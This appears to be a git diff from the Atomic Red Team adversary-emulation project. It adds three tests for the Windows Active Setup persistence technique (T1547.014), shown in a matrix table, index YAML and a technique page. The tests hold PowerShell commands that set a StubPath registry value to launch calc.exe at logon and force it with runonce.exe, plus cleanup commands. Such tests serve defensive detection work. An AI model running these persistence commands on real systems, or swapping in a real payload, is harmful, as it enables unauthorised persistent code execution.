TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Software Deployment Tools](../../T1072/T1072.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Software Deployment Tools](../../T1072/T1072.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
@@ -29721,7 +29721,76 @@ privilege-escalation:
      - 'Command: Command Execution'
      x_mitre_permissions_required:
      - Administrator
-    atomic_tests: []
+      identifier: T1547.014
+    atomic_tests:
+    - name: HKLM - Add atomic_test key to launch executable as part of user setup
+      auto_generated_guid: deff4586-0517-49c2-981d-bbea24d48d71
+      description: "This test will create an \"atomic_test\" key under 'HKLM:\\SOFTWARE\\Microsoft\\Active
+        Setup\\Installed Components' to launch calc by configuring an active setup
+        executable and \nforcing to run active setup using the \"runonce.exe /AlternateShellStartup\"
+        command. \nWithout the \"runonce.exe /AlternateShellStartup\" command it would
+        run during the next logon for each user.\n\nNote: If you logout before running
+        the cleanup command, you will be required to go through the OOBE (out-of-box
+        experience) setup sequence to log back in. \nThe payload will only run once
+        unless the cleanup command is run in between tests.\n\n[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        payload:
+          description: Payload to run once during login
+          type: String
+          default: C:\Windows\System32\calc.exe
+      executor:
+        command: "New-Item \"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\"
+          -Name \"atomic_test\" -Force\nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Active
+          Setup\\Installed Components\\atomic_test\" \"(Default)\" \"ART TEST\" -Force\nSet-ItemProperty
+          \"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\atomic_test\"
+          \"StubPath\" \"#{payload}\" -Force \n& $env:SYSTEMROOT\\system32\\runonce.exe
+          /AlternateShellStartup"
+        cleanup_command: |-
+          Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
+          Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: HKLM - Add malicious StubPath value to existing Active Setup Entry
+      auto_generated_guid: 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
+      description: "This test will add a StubPath entry to the Active Setup native
+        registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
+        \nSaid key doesn't have a StubPath value by default, by adding one it will
+        launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
+        \nWithout the last command it will normally run on next user logon. Note:
+        this test will only run once successfully if no cleanup command is run in
+        between test.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        payload:
+          description: Payload to run once during login
+          type: String
+          default: C:\Windows\System32\calc.exe
+      executor:
+        command: |-
+          Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
+          & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
+        cleanup_command: |-
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
+          Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
+        name: powershell
+        elevation_required: true
+    - name: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing
+        version number
+      auto_generated_guid: 04d55cef-f283-40ba-ae2a-316bc3b5e78c
+      description: "This test will decrease the version number of the 'Internet Explorer
+        Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for
+        the current user, \nwhich will force the StubPath payload (if set) to execute.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
+          & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
+        name: powershell
+        elevation_required: true
  T1484.002:
    technique:
      x_mitre_platforms:
@@ -50601,7 +50670,76 @@ persistence:
      - 'Command: Command Execution'
      x_mitre_permissions_required:
      - Administrator
-    atomic_tests: []
+      identifier: T1547.014
+    atomic_tests:
+    - name: HKLM - Add atomic_test key to launch executable as part of user setup
+      auto_generated_guid: deff4586-0517-49c2-981d-bbea24d48d71
+      description: "This test will create an \"atomic_test\" key under 'HKLM:\\SOFTWARE\\Microsoft\\Active
+        Setup\\Installed Components' to launch calc by configuring an active setup
+        executable and \nforcing to run active setup using the \"runonce.exe /AlternateShellStartup\"
+        command. \nWithout the \"runonce.exe /AlternateShellStartup\" command it would
+        run during the next logon for each user.\n\nNote: If you logout before running
+        the cleanup command, you will be required to go through the OOBE (out-of-box
+        experience) setup sequence to log back in. \nThe payload will only run once
+        unless the cleanup command is run in between tests.\n\n[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        payload:
+          description: Payload to run once during login
+          type: String
+          default: C:\Windows\System32\calc.exe
+      executor:
+        command: "New-Item \"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\"
+          -Name \"atomic_test\" -Force\nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Active
+          Setup\\Installed Components\\atomic_test\" \"(Default)\" \"ART TEST\" -Force\nSet-ItemProperty
+          \"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\atomic_test\"
+          \"StubPath\" \"#{payload}\" -Force \n& $env:SYSTEMROOT\\system32\\runonce.exe
+          /AlternateShellStartup"
+        cleanup_command: |-
+          Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
+          Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: HKLM - Add malicious StubPath value to existing Active Setup Entry
+      auto_generated_guid: 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
+      description: "This test will add a StubPath entry to the Active Setup native
+        registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
+        \nSaid key doesn't have a StubPath value by default, by adding one it will
+        launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
+        \nWithout the last command it will normally run on next user logon. Note:
+        this test will only run once successfully if no cleanup command is run in
+        between test.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        payload:
+          description: Payload to run once during login
+          type: String
+          default: C:\Windows\System32\calc.exe
+      executor:
+        command: |-
+          Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
+          & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
+        cleanup_command: |-
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
+          Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
+        name: powershell
+        elevation_required: true
+    - name: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing
+        version number
+      auto_generated_guid: 04d55cef-f283-40ba-ae2a-316bc3b5e78c
+      description: "This test will decrease the version number of the 'Internet Explorer
+        Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for
+        the current user, \nwhich will force the StubPath payload (if set) to execute.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
+          & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
+        name: powershell
+        elevation_required: true
  T1180:
    technique:
      x_mitre_platforms:
@@ -0,0 +1,136 @@
+# T1547.014 - Active Setup
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547/014)
+<blockquote>Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
+
+Adversaries may abuse Active Setup by creating a key under <code> HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\</code> and setting a malicious value for <code>StubPath</code>. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)
+
+Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - HKLM - Add atomic_test key to launch executable as part of user setup](#atomic-test-1---hklm---add-atomic_test-key-to-launch-executable-as-part-of-user-setup)
+
+- [Atomic Test #2 - HKLM - Add malicious StubPath value to existing Active Setup Entry](#atomic-test-2---hklm---add-malicious-stubpath-value-to-existing-active-setup-entry)
+
+- [Atomic Test #3 - HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number](#atomic-test-3---hklm---re-execute-internet-explorer-core-fonts-stubpath-payload-by-decreasing-version-number)
+
+
+<br/>
+
+## Atomic Test #1 - HKLM - Add atomic_test key to launch executable as part of user setup
+This test will create an "atomic_test" key under 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components' to launch calc by configuring an active setup executable and 
+forcing to run active setup using the "runonce.exe /AlternateShellStartup" command. 
+Without the "runonce.exe /AlternateShellStartup" command it would run during the next logon for each user.
+
+Note: If you logout before running the cleanup command, you will be required to go through the OOBE (out-of-box experience) setup sequence to log back in. 
+The payload will only run once unless the cleanup command is run in between tests.
+
+[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** deff4586-0517-49c2-981d-bbea24d48d71
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| payload | Payload to run once during login | String | C:&#92;Windows&#92;System32&#92;calc.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components" -Name "atomic_test" -Force
+Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "(Default)" "ART TEST" -Force
+Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "StubPath" "#{payload}" -Force 
+& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
+Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - HKLM - Add malicious StubPath value to existing Active Setup Entry
+This test will add a StubPath entry to the Active Setup native registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) 
+Said key doesn't have a StubPath value by default, by adding one it will launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup. 
+Without the last command it will normally run on next user logon. Note: this test will only run once successfully if no cleanup command is run in between test.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| payload | Payload to run once during login | String | C:&#92;Windows&#92;System32&#92;calc.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
+& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
+Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number
+This test will decrease the version number of the 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for the current user, 
+which will force the StubPath payload (if set) to execute.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 04d55cef-f283-40ba-ae2a-316bc3b5e78c
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
+& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
+```
+
+
+
+
+
+
+<br/>